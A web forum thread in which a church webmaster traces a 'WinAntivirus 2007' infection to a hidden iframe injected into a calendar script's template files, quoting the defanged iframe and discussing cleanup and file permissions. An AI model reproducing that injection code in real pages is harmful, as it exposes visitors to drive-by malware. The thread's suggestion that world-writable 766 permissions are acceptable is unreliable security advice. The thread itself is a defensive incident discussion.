next »

[splainin2do2]

I've had the Calendar running on our church site for a few years now, and love it.   Very easy for people to use to help enter event information without having to know a lot about computers.

Now that summer is over, we're having a lot of programs starting back up along with new ones.   I went to make some changes, and when I opened the Admin login page, I got zapped with WinAntivirus 2007!  I could watch pages and addresses blinking in the bottom of my browser, and recognized the symptoms of the infection as I've had to clean a few other folk's systems already (I do repairs in my spare time).

I cleaned my system out, and went to the calendar view page (that any visitor would see).   I got zapped again!

Right now all links to the calendar have been removed from the church site until I can find out how to fix this.   I *DO* have version 3. 21 installed.   I'm looking for info on the best way to go about fixing this problem.   Any help, Dan O. ?

P. S.  - I used to be "splainin2do" here ages ago, but I can't seem to recover my password as all my e-mail addresses I've tried aren't found.   I purchased out non-profit licence on 4/30/04 via PayPal.

[DanO]

** I got zapped with WinAntivirus 2007! **

I'm afraid I have no personal knowledge of WinAntivirus 2007 so I have no idea how it operates.

**  I *DO* have version 3. 21 installed.  **

Older CS versions had problems where other scripts could be uploaded to the server and run. It was not a problem with the script files themselves being affected.

** Any help, Dan O. ? **

Not from me I'm afraid. Someone would need to look into the script and/or template file(s) and see what has been altered (if anything). Maybe compare a copy of the files on the server to a fresh backup or archived copy?

JMO

Dan O.

[splainin2do2]

Interesting. . . !

I checked the templates files and all the html files within the calendar and admin directories had been changed on 8/30/07!  I have not looked at them all, but the ones I did look at so far have the following line added after the closing </html> tag on each of them (note: I added the "***" 's inside that link to make DARN sure nothing bad would happen here!):


<html><iframe width=0 height=0 frameborder=0 src=hxxp: www. free20. com***/portal/index. php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


I know *I* didn't do that. . .  and the log files on the server only go back to 9/1 right now.

I replaced those files with the ones I had on my system and everything seems fine now, so far.

I'm going to have to do some checking on this. . .  thanks for pointing me in the right direction!

Splainin2do

[DanO]

** I'm going to have to do some checking on this **

You definitely should.

** the log files on the server only go back to 9/1 right now. **

Your host might have older ones.

BTw. What permissions do you have the templates' directories set to?

Dan O.

[DanO]

PS. It looks like the hacker has been busy:

ww.google.com/search?num=100&q=aff%3Drazec

JFYI

Dan O.

[splainin2do2]

Yes, I read more on that after my post.   

I've changed the permissions for my templates directory (along with all files within) to 755.   My understanding is that users can still view and upload information to the calendars (I tried that to be sure), but now unless they FTP in directly to my server there is no way for them to alter the files themselves to re-insert this hack?

Does this make sense, or am I misunderstanding how file permissions work?

[DanO]

Actually, at most the data files should only need 766 (read/write for the world - not execute) but I doubt even that is needed. When the script accesses those files, the permissions you set are pretty much irrelevant (depending on server set up). Try 700, which won't allow anyone to even directly view those files from a browser... except by running the script

JMO

Dan O.